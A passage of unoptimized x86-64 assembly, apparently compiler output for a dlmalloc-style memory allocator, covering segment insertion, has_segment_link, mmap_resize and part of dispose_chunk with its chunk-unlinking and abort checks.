addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB39_2
## %bb.1:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -264(%rbp) ## 8-byte Spill
jmp LBB39_3
LBB39_2:
movq -72(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -264(%rbp) ## 8-byte Spill
LBB39_3:
movq -264(%rbp), %rax ## 8-byte Reload
movq %rax, -80(%rbp)
movq -72(%rbp), %rax
addq -80(%rbp), %rax
movq %rax, -88(%rbp)
movq -88(%rbp), %rax
movq -40(%rbp), %rcx
addq $32, %rcx
cmpq %rcx, %rax
jae LBB39_5
## %bb.4:
movq -40(%rbp), %rax
movq %rax, -272(%rbp) ## 8-byte Spill
jmp LBB39_6
LBB39_5:
movq -88(%rbp), %rax
movq %rax, -272(%rbp) ## 8-byte Spill
LBB39_6:
movq -272(%rbp), %rax ## 8-byte Reload
movq %rax, -96(%rbp)
movq -96(%rbp), %rax
movq %rax, -104(%rbp)
movq -104(%rbp), %rax
addq $16, %rax
movq %rax, -112(%rbp)
movq -104(%rbp), %rax
addq -64(%rbp), %rax
movq %rax, -120(%rbp)
movq -120(%rbp), %rax
movq %rax, -128(%rbp)
movl $0, -132(%rbp)
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
movq -24(%rbp), %rdx
subq $80, %rdx
callq _init_top
movq -64(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -104(%rbp), %rax
movq %rcx, 8(%rax)
movq -112(%rbp), %rax
movq -8(%rbp), %rcx
movq 888(%rcx), %rdx
movq %rdx, (%rax)
movq 896(%rcx), %rdx
movq %rdx, 8(%rax)
movq 904(%rcx), %rdx
movq %rdx, 16(%rax)
movq 912(%rcx), %rcx
movq %rcx, 24(%rax)
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 888(%rax)
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 896(%rax)
movl -28(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, 912(%rax)
movq -112(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 904(%rax)
LBB39_7: ## =>This Inner Loop Header: Depth=1
movq -128(%rbp), %rax
addq $8, %rax
movq %rax, -144(%rbp)
movq -128(%rbp), %rax
movq $11, 8(%rax)
movl -132(%rbp), %eax
addl $1, %eax
movl %eax, -132(%rbp)
movq -144(%rbp), %rax
addq $8, %rax
cmpq -56(%rbp), %rax
jae LBB39_9
## %bb.8: ## in Loop: Header=BB39_7 Depth=1
movq -144(%rbp), %rax
movq %rax, -128(%rbp)
jmp LBB39_10
LBB39_9:
jmp LBB39_11
LBB39_10: ## in Loop: Header=BB39_7 Depth=1
jmp LBB39_7
LBB39_11:
movq -96(%rbp), %rax
cmpq -40(%rbp), %rax
je LBB39_48
## %bb.12:
movq -40(%rbp), %rax
movq %rax, -152(%rbp)
movq -96(%rbp), %rax
movq -40(%rbp), %rcx
subq %rcx, %rax
movq %rax, -160(%rbp)
movq -152(%rbp), %rax
addq -160(%rbp), %rax
movq %rax, -168(%rbp)
movq -168(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -160(%rbp), %rcx
orq $1, %rcx
movq -152(%rbp), %rax
movq %rcx, 8(%rax)
movq -160(%rbp), %rdx
movq -152(%rbp), %rax
movq -160(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -160(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB39_20
## %bb.13:
movq -160(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -172(%rbp)
movq -8(%rbp), %rax
addq $72, %rax
movl -172(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -184(%rbp)
movq -184(%rbp), %rax
movq %rax, -192(%rbp)
movq -8(%rbp), %rax
movl (%rax), %eax
movl -172(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB39_15
## %bb.14:
movl -172(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB39_19
LBB39_15:
movq -184(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB39_17
## %bb.16:
movq -184(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -192(%rbp)
jmp LBB39_18
LBB39_17:
callq _abort
LBB39_18:
jmp LBB39_19
LBB39_19:
movq -152(%rbp), %rcx
movq -184(%rbp), %rax
movq %rcx, 16(%rax)
movq -152(%rbp), %rcx
movq -192(%rbp), %rax
movq %rcx, 24(%rax)
movq -192(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 16(%rax)
movq -184(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 24(%rax)
jmp LBB39_47
LBB39_20:
movq -152(%rbp), %rax
movq %rax, -200(%rbp)
movq -160(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -216(%rbp)
cmpl $0, -216(%rbp)
jne LBB39_22
## %bb.21:
movl $0, -212(%rbp)
jmp LBB39_26
LBB39_22:
cmpl $65535, -216(%rbp) ## imm = 0xFFFF
jbe LBB39_24
## %bb.23:
movl $31, -212(%rbp)
jmp LBB39_25
LBB39_24:
movl -216(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -220(%rbp)
movl -220(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -160(%rbp), %rdx
movl -220(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -212(%rbp)
LBB39_25:
jmp LBB39_26
LBB39_26:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movl -212(%rbp), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -208(%rbp)
movl -212(%rbp), %ecx
movq -200(%rbp), %rax
movl %ecx, 56(%rax)
movq -200(%rbp), %rax
movq $0, 40(%rax)
movq -200(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movl 4(%rax), %eax
movl -212(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB39_28
## %bb.27:
movl -212(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl 4(%rax), %ecx
movl %ecx, 4(%rax)
movq -200(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, (%rax)
movq -208(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 48(%rax)
movq -200(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 24(%rax)
movq -200(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB39_46
LBB39_28:
movq -208(%rbp), %rax
movq (%rax), %rax
movq %rax, -232(%rbp)
movq -160(%rbp), %rax
movq %rax, -280(%rbp) ## 8-byte Spill
cmpl $31, -212(%rbp)
jne LBB39_30
## %bb.29:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -288(%rbp) ## 8-byte Spill
jmp LBB39_31
LBB39_30:
movl -212(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -288(%rbp) ## 8-byte Spill
LBB39_31:
movq -280(%rbp), %rax ## 8-byte Reload
movq -288(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -240(%rbp)
LBB39_32: ## =>This Inner Loop Header: Depth=1
movq -232(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -160(%rbp), %rax
je LBB39_39
## %bb.33: ## in Loop: Header=BB39_32 Depth=1
movq -232(%rbp), %rax
addq $32, %rax
movq -240(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -248(%rbp)
movq -240(%rbp), %rax
shlq $1, %rax
movq %rax, -240(%rbp)
movq -248(%rbp), %rax
cmpq $0, (%rax)
je LBB39_35
## %bb.34: ## in Loop: Header=BB39_32 Depth=1
movq -248(%rbp), %rax
movq (%rax), %rax
movq %rax, -232(%rbp)
jmp LBB39_38
LBB39_35:
movq -248(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB39_37
## %bb.36:
movq -200(%rbp), %rcx
movq -248(%rbp), %rax
movq %rcx, (%rax)
movq -232(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 48(%rax)
movq -200(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 24(%rax)
movq -200(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB39_45
LBB39_37:
callq _abort
LBB39_38: ## in Loop: Header=BB39_32 Depth=1
jmp LBB39_44
LBB39_39:
movq -232(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -256(%rbp)
movq -232(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -289(%rbp) ## 1-byte Spill
jb LBB39_41
## %bb.40:
movq -256(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
movb %al, -289(%rbp) ## 1-byte Spill
LBB39_41:
movb -289(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB39_43
## %bb.42:
movq -200(%rbp), %rcx
movq -256(%rbp), %rax
movq %rcx, 24(%rax)
movq -232(%rbp), %rax
movq %rcx, 16(%rax)
movq -256(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 16(%rax)
movq -232(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 24(%rax)
movq -200(%rbp), %rax
movq $0, 48(%rax)
jmp LBB39_45
LBB39_43:
callq _abort
LBB39_44: ## in Loop: Header=BB39_32 Depth=1
jmp LBB39_32
LBB39_45:
jmp LBB39_46
LBB39_46:
jmp LBB39_47
LBB39_47:
jmp LBB39_48
LBB39_48:
addq $304, %rsp ## imm = 0x130
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function has_segment_link
_has_segment_link: ## @has_segment_link
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq -16(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -32(%rbp)
LBB40_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
jb LBB40_4
## %bb.2: ## in Loop: Header=BB40_1 Depth=1
movq -32(%rbp), %rax
movq -24(%rbp), %rcx
movq (%rcx), %rcx
movq -24(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
jae LBB40_4
## %bb.3:
movl $1, -4(%rbp)
jmp LBB40_7
LBB40_4: ## in Loop: Header=BB40_1 Depth=1
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
cmpq $0, %rax
jne LBB40_6
## %bb.5:
movl $0, -4(%rbp)
jmp LBB40_7
LBB40_6: ## in Loop: Header=BB40_1 Depth=1
jmp LBB40_1
LBB40_7:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function mmap_resize
_mmap_resize: ## @mmap_resize
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movl %ecx, -36(%rbp)
movq -24(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -48(%rbp)
movq -32(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB41_2
## %bb.1:
movq $0, -8(%rbp)
jmp LBB41_13
LBB41_2:
movq -48(%rbp), %rax
movq -32(%rbp), %rcx
addq $8, %rcx
cmpq %rcx, %rax
jb LBB41_5
## %bb.3:
movq -48(%rbp), %rax
subq -32(%rbp), %rax
movq _mparams+16(%rip), %rcx
shlq $1, %rcx
cmpq %rcx, %rax
ja LBB41_5
## %bb.4:
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB41_13
LBB41_5:
movq -24(%rbp), %rax
movq (%rax), %rax
movq %rax, -56(%rbp)
movq -48(%rbp), %rax
addq -56(%rbp), %rax
addq $32, %rax
movq %rax, -64(%rbp)
movq -32(%rbp), %rax
addq $48, %rax
addq $15, %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -72(%rbp)
movq $-1, %rax
movq %rax, -80(%rbp)
movq $-1, %rax
cmpq %rax, -80(%rbp)
je LBB41_11
## %bb.6:
movq -80(%rbp), %rax
addq -56(%rbp), %rax
movq %rax, -88(%rbp)
movq -72(%rbp), %rax
subq -56(%rbp), %rax
subq $32, %rax
movq %rax, -96(%rbp)
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 8(%rax)
movq -88(%rbp), %rax
movq -96(%rbp), %rcx
movq $11, 8(%rax,%rcx)
movq -88(%rbp), %rax
movq -96(%rbp), %rcx
movq $0, 16(%rax,%rcx)
movq -80(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
jae LBB41_8
## %bb.7:
movq -80(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
LBB41_8:
movq -72(%rbp), %rax
subq -64(%rbp), %rax
movq -16(%rbp), %rcx
addq 856(%rcx), %rax
movq %rax, 856(%rcx)
movq -16(%rbp), %rcx
cmpq 864(%rcx), %rax
jbe LBB41_10
## %bb.9:
movq -16(%rbp), %rax
movq 856(%rax), %rcx
movq -16(%rbp), %rax
movq %rcx, 864(%rax)
LBB41_10:
movq -88(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB41_13
LBB41_11:
jmp LBB41_12
LBB41_12:
movq $0, -8(%rbp)
LBB41_13:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function dispose_chunk
_dispose_chunk: ## @dispose_chunk
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $400, %rsp ## imm = 0x190
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $1, %rax
cmpq $0, %rax
jne LBB42_82
## %bb.1:
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rax, -48(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
jne LBB42_5
## %bb.2:
movq -48(%rbp), %rax
addq $32, %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rdi
xorl %eax, %eax
## kill: def $rax killed $eax
subq -48(%rbp), %rax
addq %rax, %rdi
movq -24(%rbp), %rsi
callq _munmap
cmpl $0, %eax
jne LBB42_4
## %bb.3:
movq -24(%rbp), %rdx
movq -8(%rbp), %rax
movq 856(%rax), %rcx
subq %rdx, %rcx
movq %rcx, 856(%rax)
LBB42_4:
jmp LBB42_201
LBB42_5:
movq -16(%rbp), %rax
xorl %ecx, %ecx
## kill: def $rcx killed $ecx
subq -48(%rbp), %rcx
addq %rcx, %rax
movq %rax, -40(%rbp)
movq -48(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -40(%rbp), %rax
movq %rax, -16(%rbp)
movq -40(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_80
## %bb.6:
movq -16(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
je LBB42_76
## %bb.7:
movq -48(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB42_26
## %bb.8:
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -56(%rbp)
movq -16(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -64(%rbp)
movq -48(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -68(%rbp)
movq -56(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -68(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -353(%rbp) ## 1-byte Spill
je LBB42_12
## %bb.9:
movq -56(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -354(%rbp) ## 1-byte Spill
jb LBB42_11
## %bb.10:
movq -56(%rbp), %rax
movq 24(%rax), %rax
cmpq -16(%rbp), %rax
sete %al
movb %al, -354(%rbp) ## 1-byte Spill
LBB42_11:
movb -354(%rbp), %al ## 1-byte Reload
movb %al, -353(%rbp) ## 1-byte Spill
LBB42_12:
movb -353(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_24
## %bb.13:
movq -64(%rbp), %rax
cmpq -56(%rbp), %rax
jne LBB42_15
## %bb.14:
movl -68(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB42_23
LBB42_15:
movq -64(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -68(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -355(%rbp) ## 1-byte Spill
je LBB42_19
## %bb.16:
movq -64(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -356(%rbp) ## 1-byte Spill
jb LBB42_18
## %bb.17:
movq -64(%rbp), %rax
movq 16(%rax), %rax
cmpq -16(%rbp), %rax
sete %al
movb %al, -356(%rbp) ## 1-byte Spill
LBB42_18:
movb -356(%rbp), %al ## 1-byte Reload
movb %al, -355(%rbp) ## 1-byte Spill
LBB42_19:
movb -355(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_21
## %bb.20:
movq -64(%rbp), %rcx
movq -56(%rbp), %rax
movq %rcx, 24(%rax)
movq -56(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_22
LBB42_21:
callq _abort
LBB42_22:
jmp LBB42_23
LBB42_23:
jmp LBB42_25
LBB42_24:
callq _abort
LBB42_25:
jmp LBB42_75
LBB42_26:
movq -16(%rbp), %rax
movq %rax, -80(%rbp)
movq -80(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -88(%rbp)
movq -80(%rbp), %rax
movq 24(%rax), %rax
cmpq -80(%rbp), %rax
je LBB42_34
## %bb.27:
movq -80(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -104(%rbp)
movq -80(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -96(%rbp)
movq -104(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -357(%rbp) ## 1-byte Spill
jb LBB42_30
## %bb.28:
movq -104(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -80(%rbp), %rcx
movb %al, -357(%rbp) ## 1-byte Spill
jne LBB42_30
## %bb.29:
movq -96(%rbp), %rax
movq 16(%rax), %rax
cmpq -80(%rbp), %rax
sete %al
movb %al, -357(%rbp) ## 1-byte Spill
LBB42_30:
movb -357(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_32
## %bb.31:
movq -96(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 24(%rax)
movq -104(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_33
LBB42_32:
callq _abort
LBB42_33:
jmp LBB42_46
LBB42_34:
movq -80(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -112(%rbp)
movq 40(%rax), %rax
movq %rax, -96(%rbp)
cmpq $0, %rax
jne LBB42_36
## %bb.35:
movq -80(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -112(%rbp)
movq 32(%rax), %rax
movq %rax, -96(%rbp)
cmpq $0, %rax
je LBB42_45
LBB42_36:
jmp LBB42_37
LBB42_37: ## =>This Inner Loop Header: Depth=1
movq -96(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -120(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -358(%rbp) ## 1-byte Spill
jne LBB42_39
## %bb.38: ## in Loop: Header=BB42_37 Depth=1
movq -96(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -120(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -358(%rbp) ## 1-byte Spill
LBB42_39: ## in Loop: Header=BB42_37 Depth=1
movb -358(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB42_40
jmp LBB42_41
LBB42_40: ## in Loop: Header=BB42_37 Depth=1
movq -120(%rbp), %rax
movq %rax, -112(%rbp)
movq (%rax), %rax
movq %rax, -96(%rbp)
jmp LBB42_37
LBB42_41:
movq -112(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_43
## %bb.42:
movq -112(%rbp), %rax
movq $0, (%rax)
jmp LBB42_44
LBB42_43:
callq _abort
LBB42_44:
jmp LBB42_45
LBB42_45:
jmp LBB42_46
LBB42_46:
cmpq $0, -88(%rbp)
je LBB42_74
## %bb.47:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -80(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -128(%rbp)
movq -80(%rbp), %rax
movq -128(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB42_51
## %bb.48:
movq -96(%rbp), %rax
movq -128(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB42_50
## %bb.49:
movq -80(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB42_50:
jmp LBB42_58
LBB42_51:
movq -88(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_56
## %bb.52:
movq -88(%rbp), %rax
movq 32(%rax), %rax
cmpq -80(%rbp), %rax
jne LBB42_54
## %bb.53:
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB42_55
LBB42_54:
movq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 40(%rax)
LBB42_55:
jmp LBB42_57
LBB42_56:
callq _abort
LBB42_57:
jmp LBB42_58
LBB42_58:
cmpq $0, -96(%rbp)
je LBB42_73
## %bb.59:
movq -96(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_71
## %bb.60:
movq -88(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 48(%rax)
movq -80(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -136(%rbp)
cmpq $0, %rax
je LBB42_65
## %bb.61:
movq -136(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_63
## %bb.62:
movq -136(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 32(%rax)
movq -96(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB42_64
LBB42_63:
callq _abort
LBB42_64:
jmp LBB42_65
LBB42_65:
movq -80(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
je LBB42_70
## %bb.66:
movq -144(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_68
## %bb.67:
movq -144(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 40(%rax)
movq -96(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB42_69
LBB42_68:
callq _abort
LBB42_69:
jmp LBB42_70
LBB42_70:
jmp LBB42_72
LBB42_71:
callq _abort
LBB42_72:
jmp LBB42_73
LBB42_73:
jmp LBB42_74
LBB42_74:
jmp LBB42_75
LBB42_75:
jmp LBB42_79
LBB42_76:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $3, %rax
jne LBB42_78
## %bb.77:
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
movq -32(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
jmp LBB42_201
LBB42_78:
jmp LBB42_79
LBB42_79:
jmp LBB42_81
LBB42_80:
callq _abort
LBB42_81:
jmp LBB42_82
LBB42_82:
movq -32(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_200
## %bb.83:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $2, %rax
cmpq $0, %rax
jne LBB42_163
## %bb.84:
movq -32(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 40(%rcx), %rax
jne LBB42_88
## %bb.85:
movq -24(%rbp), %rax
movq -8(%rbp), %rcx
addq 16(%rcx), %rax
movq %rax, 16(%rcx)
movq %rax, -152(%rbp)
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 40(%rax)
movq -152(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB42_87
## %bb.86:
movq -8(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movq $0, 8(%rax)
LBB42_87:
jmp LBB42_201
LBB42_88:
movq -32(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB42_90
## %bb.89:
movq -24(%rbp), %rax
movq -8(%rbp), %rcx
addq 8(%rcx), %rax
movq %rax, 8(%rcx)
movq %rax, -160(%rbp)
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 32(%rax)
movq -160(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -160(%rbp), %rdx
movq -16(%rbp), %rax
movq -160(%rbp), %rcx
movq %rdx, (%rax,%rcx)
jmp LBB42_201
LBB42_90:
movq -32(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -168(%rbp)
movq -168(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -168(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB42_109
## %bb.91:
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -176(%rbp)
movq -32(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -184(%rbp)
movq -168(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -188(%rbp)
